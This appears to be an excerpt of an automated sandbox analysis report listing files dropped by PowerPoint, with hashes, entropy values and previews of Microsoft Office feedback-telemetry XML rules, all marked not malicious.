                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490024" V="0" DC="SM" EN="Office.Feedback.Survey.Floodgate.EngineStarted" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="c9kah" A="dcix0" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="U64" I="1" O="true" N="FloodgateStartTimeMs">.. <S T="1" F="FloodgateStartTimeMs" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):532
                                                                                                                              Entropy (8bit):5.250327563895679
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdCjX9PMiBPQjP5iAGerTHLGfUIdLWtlAGnNO2su:2dCT9FPoiAZrTHlkKN
                                                                                                                              MD5:B110F12E3CEFF00FA7291475911706D2
                                                                                                                              SHA1:DC5B77C871FE160C16876423C5CD6BB58F59E685
                                                                                                                              SHA-256:F3CC44E948AB4DE371618A9A80678A261FD78495C87FC2767B6055CD722697A3
                                                                                                                              SHA-512:7FC0FFA107716AC88281D91ACD97E7663970BC9BFC66C19D2425D2750F4E7114EA6DF9B14E863B48A364D3582B1D01206950DC508F51DEA7F8E399C8764A694C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490025" V="0" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.GetDecisionForActionPreStart" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="947yn" A="947ym" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyId">.. <S T="1" F="ActionId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):526
                                                                                                                              Entropy (8bit):5.2368508517516075
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdrjX9ZLPPQjP5iAFerudDGfUIdLStlIm/NO2su:2drT9JPPoiAwruddkOT
                                                                                                                              MD5:50319BBE2DEAAD25B7BFAC6FD119700B
                                                                                                                              SHA1:F0DCBA9F8725416D9BE50E1D24CB13B6EB9D4E5D
                                                                                                                              SHA-256:29243310207196CE758FE9F849028418AE25D2C90FF879D2CF1BD0F5C8F1091D
                                                                                                                              SHA-512:D42741DF6AB836A5132AEE9D0E5745400F286D500CC75315573E1859982A23AAAADDB7A4B5B49E35B0300D19D38A6C7A4701187A8CDCA377E8D75CFAB211D79A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490027" V="1" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.CampaignScope" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="93uqm" A="93uql de88r de88q" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="CampaignId">.. <S T="1" F="CampaignId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):723
                                                                                                                              Entropy (8bit):5.183641976679839
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdQgj2RBPQjP5iUvAQ2GerGfUIn+IWF/VWaody9WtlZQIdV9UXNO2su:2dQgwPoiUmZrhLA8kY9
                                                                                                                              MD5:0094BCD57BF7071DF56EDA89F922D4AA
                                                                                                                              SHA1:E678BE3348BF636354365A083D611BD17FDA7B3C
                                                                                                                              SHA-256:93A182F5E1A54AFC5A9E8EAF30BC84BF199AB03CF9F0AA10B6D9975F27B3FF25
                                                                                                                              SHA-512:07BF673AE55162975DF3D1005C19601E62CE291119286F318969A312FA537FCDD405F5FE5F1FA943F285A73FA6A241280A549C830CD22358E82E06ECBC959208
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490028" V="0" DC="SM" EN="Office.Feedback.Survey.ShowBusinessBarResult" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" T="Upload-Medium" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="dfjpi" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="B" I="1" O="true" N="BusinessBarShown">.. <S T="1" F="BusinessBarShown" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="SurveyId">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="3" O="true" N="UniqueId">.. <S T="1" F="UniqueId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):432
                                                                                                                              Entropy (8bit):5.2768580605666076
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:6:TMVBdj1mkgAxmX9GwWZbBPQe8u0RAUiG5rHperhJdM0upx7IwLKBsfUSFNOn2sby:TMHdBgjX9+PQjP5iAFerbSJfUINO2su
                                                                                                                              MD5:D7665B2A07F867142829D88CD77EC5EB
                                                                                                                              SHA1:2A99EB4A093FBAB26C50E9B42C91A89C37DFE7DE
                                                                                                                              SHA-256:84093C3E82784CA1E801489E7EDCA00679DD5FC8A77755BDE22ABF7345B1A20B
                                                                                                                              SHA-512:7426547CAA0A365F4467D94B4E3A39D531B06129A1D8B2416121F882B2D0B545CA8880BCE38CBB4E0C55DF143D786BE305BD7C476D9D6D2E84FEB6D907E7D01B
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490029" V="0" DC="SM" EN="Office.Feedback.Survey.FloodgateClient.ScopeCompareLatency" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" T="Upload-Medium" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="de88s" A="de88t de88u" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):715
                                                                                                                              Entropy (8bit):5.162562112883083
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdwpjbSBBPQjP5iUvAQjerKjfUIdLWtiOZQIdy99UX4WtvMfZvkNO2su:2dwpCBBPoiU6rKIknk3xM5M
                                                                                                                              MD5:27659BA5C87D859CB7D8AC1BED91799D
                                                                                                                              SHA1:0D54B87E8F42674C633CE27B684FE67D2A58F574
                                                                                                                              SHA-256:E168AFE8E6E81112011922E39D36EAF8B633224B34489A979830BEEE10B96E9E
                                                                                                                              SHA-512:172FFAB4E260F722DEC694361711C76EF28320F6E70608EE22254A0CC521A6E899613CF8430181FD4DFA557F61F30EC2051810B5ADF162456EA1CABA9DDD7678
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490030" V="2" DC="SM" EN="Office.Feedback.Survey.UI.Win32.FormClosed" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DL="B" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bwehn" A="63k36 4n2e0 4n2ex" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyID">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <C T="W" I="2" O="true" N="UniqueId">.. <S T="1" F="UniqueId" M="Ignore" />.. </C>.. <C T="U32" I="3" O="true" N="SurveyType">.. <S T="1" F="SurveyType" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):586
                                                                                                                              Entropy (8bit):5.312769094340112
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdpVjIhPQjP5iEerq54FVlC3GxwOfUIdLWtlZQINO2su:2dHkhPoiLrHCPkHg
                                                                                                                              MD5:C215B41707B89D69F9352608A43B0CCF
                                                                                                                              SHA1:12246E1A6DD313D7FF6C4720781C031E668C12C6
                                                                                                                              SHA-256:4DB9C9F15FFC10B569A088CBAF4D5286B87214F1EA4099A4846D23B10E9B7FCB
                                                                                                                              SHA-512:06FCD211257FC218D3496EF835B1F1B2AB278DEC60E626C94D54DE5235E024F6C9DF881A5C539E482C8B8A343844618CAE16CAB4C686F2DB48E7EAEAE5EB744A
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="490031" V="0" DC="SM" EN="Office.Feedback.Survey.Deserialization.Error" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="9mjrl" A="9mjrk 8pgfl 9mjqt 9mjqs 8pgfe 9mjqq 9mjqp 8pgfd 7i427 9mjqo 9mjqn 8pgfc 9mjqm 9mjql 8pgfb 86t2j 86t2i 8pgfa" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <C T="W" I="1" O="true" N="SurveyId">.. <S T="1" F="SurveyId" M="Ignore" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):813
                                                                                                                              Entropy (8bit):4.312139265456619
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd3SsbGPQjP5iUvAQierZ+u/lOaNeznfH/M//CK5eNX/c//aNeLfH/M//bU5eS:2d3SsbGPoiUFrAuXKf5TyfB
                                                                                                                              MD5:97480887C909657DE2E6C26767D44658
                                                                                                                              SHA1:4E235FDA43B2DF293E768EF12B97575650CF0E39
                                                                                                                              SHA-256:ED0DCF19493A7776AC2CB31C119E7C6FE5881A857FDE57FC7D6A256C4784A3D1
                                                                                                                              SHA-512:BC2706C806E0E02DA762F662BE61F77A7092B5DCEEC258FEDE055777B37CF4B015F8F8BF598CF9FCD90FA8E5450888FAA1508A18C7628E8ACB76980BC4F34B56
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500000" V="2" DC="SM" EN="Office.Feedback.InApp.UI.Win32.FromOutSpace" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgmnm" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Tcid" />.. </L>.. <R>.. <V V="27265" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ParentTcid" />.. </L>.. <R>.. <V V="19951" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):807
                                                                                                                              Entropy (8bit):4.291095535715688
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdGpSsk7hPQjP5iUvAQierZ+u/lOaNeznfH/M//UU5eNX/c//aNeLfH/M//h5J:2dYSsk7hPoiUFrAuXKf5vTyfk
                                                                                                                              MD5:CAB89818EFC86AD02F0DFC239934F550
                                                                                                                              SHA1:1BD2A84159C5C1CA7C79FACACE3B32ACAE3C039B
                                                                                                                              SHA-256:42242208505A53696C66CE210D21AEDC387BE5E18498DFA44EF2145FD6CE8A3D
                                                                                                                              SHA-512:D0DD59CAA213F3ACA632467A4292788EEC434B1B2CD705325C4C5A3AAF85AB67A0F98999223245A30529555DD5F2AE3B1EAFE348DEC6BDC1363B78BF300C63E2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500001" V="2" DC="SM" EN="Office.Feedback.InApp.UI.Win32.FromRibbon" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgmnm" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Tcid" />.. </L>.. <R>.. <V V="27302" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ParentTcid" />.. </L>.. <R>.. <V V="0" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):811
                                                                                                                              Entropy (8bit):4.304696165971124
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdhSsDPQjP5iUvAQierZ+u/lOaNeznfH/M//UU5eNX/c//aNeLfH/M//rGs45J:2dhSsDPoiUFrAuXKf5vTyfqG7
                                                                                                                              MD5:B9FE84C8034F0390B6F40B5CC51392C2
                                                                                                                              SHA1:8074392B8D11F6EC88587888CB6CD307B9C2069D
                                                                                                                              SHA-256:3BB3612B624CC8BE710752821DAB8FB8BA86F8F464C6EE74FB3D51C3CA167E12
                                                                                                                              SHA-512:9EBAE6EB69B391DF1CBEEAD5FBB0A4C905E367B22C9F137411E616BA972BA0B2707D6E0B83B6CC01ADB26B3256A8C49D70E481EFBF3D3F3FA944E3CDF0AA6437
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500002" V="2" DC="SM" EN="Office.Feedback.InApp.UI.Win32.FromTellMe" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgmnm" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Tcid" />.. </L>.. <R>.. <V V="27302" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ParentTcid" />.. </L>.. <R>.. <V V="25646" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):811
                                                                                                                              Entropy (8bit):4.30035311191936
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdaSsFTKPQjP5iUvAQierZ+u/lOaNeznfH/M//S5eNX/c//aNeLfH/M//bU5eS:2daSsFePoiUFrAuXKfQTyfB
                                                                                                                              MD5:BA748D3B24E6AA62D2E5EA0548922F3C
                                                                                                                              SHA1:EB12C2030E90DF951FFBFDD87C69BE32DCD53420
                                                                                                                              SHA-256:8B03F24F3FFC841B220092E7B8E075F5AD1B2D6A011538E187E7031F444D86DE
                                                                                                                              SHA-512:05EE44878DCD91FC2A8A20BE7AE002DFFCAFAC66767B81E17F3E75F8AF40AC96EDC614EA4B272DD42136F7B242D2D155FC595FD39CB0CB7DC8BE90CD5242F114
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500003" V="2" DC="SM" EN="Office.Feedback.InApp.UI.Win32.ClickSmile" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgmnm" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Tcid" />.. </L>.. <R>.. <V V="24269" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ParentTcid" />.. </L>.. <R>.. <V V="19951" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):811
                                                                                                                              Entropy (8bit):4.309548301743047
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdzSs0XnPPQjP5iUvAQierZ+u/lOaNeznfH/M//E5eNX/c//aNeLfH/M//bU5J:2dzSs0fPoiUFrAuXKfCTyfB
                                                                                                                              MD5:5B3ABF9CB31A50B750EC880004015F44
                                                                                                                              SHA1:9DA439D71D21C99F2DB6E12C40C751774908D01B
                                                                                                                              SHA-256:41FC176144E290AF26681D8BAA60E74877FBDE804082A60421BC5A859592D55A
                                                                                                                              SHA-512:1A20B437010A4E17D51C2D5BFC6996A370D2F71D70E8680F05919F7A02EC95FEF38E64C074A2C45376B6AE7ADB61D551ACD8291D27BCCAF8D6F51EE7778B7F6F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500004" V="2" DC="SM" EN="Office.Feedback.InApp.UI.Win32.ClickFrown" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgmnm" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Tcid" />.. </L>.. <R>.. <V V="24270" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ParentTcid" />.. </L>.. <R>.. <V V="19951" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):810
                                                                                                                              Entropy (8bit):4.300576973226168
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd6JTSsZPQjP5iUvAQierZ+u/lOaNeznfH/M//+5eNX/c//aNeLfH/M//bU5eS:2d6pSsZPoiUFrAuXKfUTyfB
                                                                                                                              MD5:1539074CD194926C3AF7BA9423AF396D
                                                                                                                              SHA1:DE1DA008D48814ED947076EEBE009D8027E856D9
                                                                                                                              SHA-256:B774418C18E4440F09B2C66D5ED38F05C9C6DF24CE2BCA0BE7E373A6A930E4EC
                                                                                                                              SHA-512:505FCDE6A62EEA04B80FAAF63C069C2ADC4EF6848676A58D87376A88CE713EA5E5B9414A200EFC659C14C41EC92EE7D66A40062E21E83D180E0DD11787E54039
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500005" V="2" DC="SM" EN="Office.Feedback.InApp.UI.Win32.ClickIdea" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bgmnm" />.. <F T="2">.. <O T="AND">.. <L>.. <O T="EQ">.. <L>.. <S T="1" F="Tcid" />.. </L>.. <R>.. <V V="27268" T="I32" />.. </R>.. </O>.. </L>.. <R>.. <O T="EQ">.. <L>.. <S T="1" F="ParentTcid" />.. </L>.. <R>.. <V V="19951" T="I32" />.. </R>.. </O>.. </R>.. </O>.. </F>.. </S>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):514
                                                                                                                              Entropy (8bit):4.9706193864986
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdMaSsnDHFPQjP5iUvAQierDNT+u/qNO8T/X/c//wVrMpONEOjsu:2ddSsxPoiUFrsuyBLjh
                                                                                                                              MD5:2D4196F9CBB111960190988622AC5632
                                                                                                                              SHA1:D60CDDF713D096649CDCF7FDE93FFCC31C24037C
                                                                                                                              SHA-256:B18A3AC161D60E4DAF865CCD9309D906E3F327D0D5EF1660E5B6979B9BD2C8AF
                                                                                                                              SHA-512:47DE1FB0B3BE08FBC445DF572E2ADE4722F1FFCBD02CB51737790B231A8E4A3507F798D6F6A091552DA2F22445CD604B6922EAE17B18CA62A18C2A838AD39570
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500006" V="2" DC="SM" EN="Office.Feedback.InApp.UI.Win32.UserVoiceRedirect" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmhr6" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="UserVoice" />.. </L>.. <R>.. <V V="true" T="B" />.. </R>.. </O>.. </F>.. </S>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):433
                                                                                                                              Entropy (8bit):5.308582096223094
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdnSs3KBuPQjP5iUvAQierDFzpNfUINO2su:2dnSs3PoiUFrfKg
                                                                                                                              MD5:340296378E172B9C30902B76B0E553A3
                                                                                                                              SHA1:1E86D8CD1859B4DB2B04F1EF44AD314EAD69EFDA
                                                                                                                              SHA-256:519EF7F45337BC950B8612AB0D9062513D294E5C5C69F4FB0172B23AA74E563B
                                                                                                                              SHA-512:EC3ACB3BAC67E6F42EF77D755CC34BC3DB7CC5AADECA40BB3DBAEB13F077ACAA28C435B3272A0F5BFF278355AA72F6443F31E6A9DBE3FECB9509B51DDA9D0B77
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500007" V="1" DC="SM" EN="Office.Feedback.InApp.UI.Win32.ExtendedExperience" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmc7n" A="blief blieg" />.. </S>.. <C T="TAG" I="0" O="false" N="EventId">.. <S T="1" F="ULS_Tag" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):511
                                                                                                                              Entropy (8bit):4.974150258924041
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdfSsuPQjP5iUvAQierDFK/+u/qNOCX/c//bLMpONEOjsu:2dfSsuPoiUFrLuyxin
                                                                                                                              MD5:277892A14D891D1B454D249632FB58E0
                                                                                                                              SHA1:B11863AB56BD0E328A5DFA7192560D3576E4AB16
                                                                                                                              SHA-256:860876F97AF134800FE88D5F662CC9D0E3C21807D4643D7D2FB1A405AFA40878
                                                                                                                              SHA-512:12A540631630350A4040E65C0F57D975E6856C046C52212E244E863E6864C43B09ED91E34AEFAD7905296B3A02BD70D674694928D35E6A7B5BC1FD80BF0CA898
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500008" V="2" DC="SM" EN="Office.Feedback.InApp.UI.Win32.CancelDialog" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bmc7o" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="NormalExit" />.. </L>.. <R>.. <V V="false" T="B" />.. </R>.. </O>.. </F>.. </S>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):899
                                                                                                                              Entropy (8bit):4.952479754079968
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHduK2dBPQjP5iUvAQierDv+u/qNODX/c//J/pONUV3fIy8n+HZRIy6Cynt9TI/:2dH2XPoiUFrauykO//
                                                                                                                              MD5:DAFF902266E22EA10C7F6414EEF82B4F
                                                                                                                              SHA1:F6519F5B68533490CF1BDAB813A830791BCE57BA
                                                                                                                              SHA-256:7DD08B3E0BD33EAE6DF6084B071FA864426C6625ACA21D8E1DA80A17D149B94C
                                                                                                                              SHA-512:3498A9D8A5598EA1E5538EE0921FEDB8AA4402102D0C7AABD91EBA60C5A7E919EFAD36788F944F5E17C23FDF974063841DB9DC3EC59980EDC593FD27B4586461
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="500009" V="4" DC="SM" EN="Office.Feedback.InApp.FeedbackSaved" ATT="d79e824386c4441cb8c1d4ae15690526-bd443309-5494-444a-aba9-0af9eef99f84-7360" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bm22r" />.. <F T="2">.. <O T="EQ">.. <L>.. <S T="1" F="FeedbackOrSurvey" />.. </L>.. <R>.. <V V="Feedback" T="W" />.. </R>.. </O>.. </F>.. </S>.. <C T="B" I="0" O="true" N="IsEmailIncluded">.. <S T="1" F="IncludeEmail" />.. </C>.. <C T="B" I="1" O="true" N="IsScreenshotIncluded">.. <S T="1" F="IncludeScreenshot" />.. </C>.. <C T="B" I="2" O="true" N="IsDiagnosticsIncluded">.. <S T="1" F="IncludeDiagnostics" />.. </C>.. <C T="W" I="3" O="true" N="ClientFeedbackId">.. <S T="1" F="ClientFeedbackId" />.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):600
                                                                                                                              Entropy (8bit):5.207482801991389
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdUN2KiKBPQjP5iUvAQiercfUIdLEjdy9bGNO2su:2dUN2KvPoiUFrvkyZ
                                                                                                                              MD5:70A72B681FAA5A7D4CD4D2EF3589AD74
                                                                                                                              SHA1:809790B97BBFB93058DD157DBF2E93588121F75B
                                                                                                                              SHA-256:DE8BC0642B1701286F900E4A644E08B0BE3CF7DB5F7400C2CB065651A8FDABC2
                                                                                                                              SHA-512:07E6BDB522323AE28E8FF1BBAB1512C7F42A0729C4BA8A09BB9D967E45FF2C6965C990B5871B0907B1A92574B89B5AE803C6F8BDFAE4CDAD706BE96F883D1440
                                                                                                                              Malicious:false
